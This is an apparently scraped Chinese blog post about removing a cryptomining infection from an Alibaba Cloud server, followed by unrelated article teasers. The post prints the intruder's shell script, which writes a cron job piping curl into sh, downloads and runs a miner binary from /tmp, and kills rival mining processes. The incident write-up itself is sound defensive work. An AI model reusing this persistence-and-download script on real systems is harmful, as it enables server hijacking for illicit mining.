Emm,qW3xT 2(礦機程序)

2021-09-20 01:16:37 字數 3925 閱讀 3530

emmm,長話短說,阿里雲伺服器被掛礦機了。

事情還得從兩三天前說起。7-31阿里雲給我發了乙個簡訊。

我還專門和朋友談(chao)論(feng)root被提權是什麼鬼邏輯,然後就沒理。。因為伺服器是自己玩的用,開發階段給前端暴露api用的,沒什麼重要的資料。然後:

這個簡訊又發生在8-2號,what,大男子主義上來了,覺得這13有點過分了,有點變本加厲的意思了,然後就說去看看。(當時第一想法就是去看看程序有啥異樣)

wtf,簡直不要13 face,cpu占用99.3%,那我用0.7%嗎。

.ssh目錄看看

[root@fantj .ssh]# ls


authorized_keys
這可是無密登入的鑰匙啊!用於主機之間的無密通訊。果斷刪。

查查這個命令在哪

[root@fantj ~]# find / -name qw3xt*


/tmp/qw3xt.2
捕捉異常

記住這個畫面

發現可疑執行緒

終止礦機指令碼

又出來了

我為什麼會針對它:

pid號很大,證明是新執行緒

每次我kill了礦機,它就會執行,然後就消失。(後面會證明這個言論)

從cpu的穩定來看,沒有執行新指令cpu一般均衡。

1022  ps -aux|grep ddg


1023  kill 11938


1024  kill 27507


[root@fantj ~]# find / -name ddgs.3013


/tmp/ddgs.3013
幹了前面覺得還是沒有弄乾淨,所以我想去看看定時任務列表。

[root@fantj tmp]# crontab -l


*/15 * * * * curl -fssl  | sh
emmm,這一刻真是激動和喜悅。

-f - fail在http錯誤(h)上靜默失敗(根本沒有輸出)

-s -silent靜音模式。 不要輸出任何東西

--socks4 host [:port]給定主機+埠上的socks4**

--socks4a host [:port]給定主機+埠上的socks4a**

--socks5 host [:port]給定主機+埠上的socks5**

--socks5-hostname host [:port] socks5**,將主機名傳遞給**

--socks5-gssapi-service名稱為gssapi的socks5**服務名稱

--socks5-gssapi-nec與nec socks5伺服器的相容性

-s --show-error顯示錯誤。 使用-s時,make curl會在出現錯誤時顯示錯誤

-l --location遵循重定向(h)

--location-trusted like --location並將auth傳送給其他主機(h)

[root@fantj tmp]# crontab -r 


[root@fantj tmp]# crontab -l


no crontab for root
那又得查查這個i.sh了,突然想起有個定時任務,然後我把定時任務的job執行了以下:

[root@fantj tmp]# curl -fssl 


export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin


echo "" > /var/spool/cron/root


echo "*/15 * * * * curl -fssl  | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs


echo "" > /var/spool/cron/crontabs/root


echo "*/15 * * * * curl -fssl  | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013


if [ ! -f "/tmp/ddgs.3013" ]; then


curl -fssl  -m) -o /tmp/ddgs.3013


fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013


ps auxf | grep -v grep | grep circle_mi | awk '' | xargs kill


ps auxf | grep -v grep | grep get.bi-chi.com | awk '' | xargs kill


ps auxf | grep -v grep | grep hashvault.pro | awk '' | xargs kill


ps auxf | grep -v grep | grep nanopool.org | awk '' | xargs kill


ps auxf | grep -v grep | grep minexmr.com | awk '' | xargs kill


ps auxf | grep -v grep | grep /boot/efi/ | awk '' | xargs kill


#ps auxf | grep -v grep | grep ddg.2006 | awk '' | kill


#ps auxf | grep -v grep | grep ddg.2010 | awk '' | kill
設定環境變數,寫定時任務

批量根據關鍵字殺程序。

我發現有個grep minexmr.com.開啟一看,其他**同理。

問題解決了,過段時間再看看程序情況,應該是沒有了,可以說殺的挺徹底了。那麼這問題為什麼會出現呢。

不過這個13有個很良心的操作,就是沒有刪我的redis的keys,很有職業操守。但是還是被金錢奴隸。

關於 0x3f3f3f3f 的問題

0x3f3f3f3f是乙個很有用的數值,它是滿足以下兩個條件的最大整數。1 整數的兩倍不超過 0x7f7f7f7f,即int能表示的最大正整數。2 整數的每8位 每個位元組 都是相同的。我們在程式設計中經常需要使用 memset a,val,sizeof a 初始化乙個陣列a,該語句把數值 val ...

0x3f3f3f3f(無窮大數)

一般定義無窮大數都是inf 99999999,或者0x7f ff ff ff,但是有的時候inf過大,雖然保證了沒有數超過它,但是在需要加上乙個數的時候,inf a可能會導致溢位,最終變成乙個負數。而0x3f3f3f3f的數量級也1e9的,一般題不會給超過1e9的數 在把它當成無窮大的時候,兩個0x...

Python3物件導向 3 異常(3)異常作用

當丟擲異常時,看起來好像立即停止了程式的執行。丟擲異常之後的所有 都不會執行,除非處理了這一異常,程式將會退出並給出錯誤資訊。def no return print i am about to raise an exception raise exception this is always rai...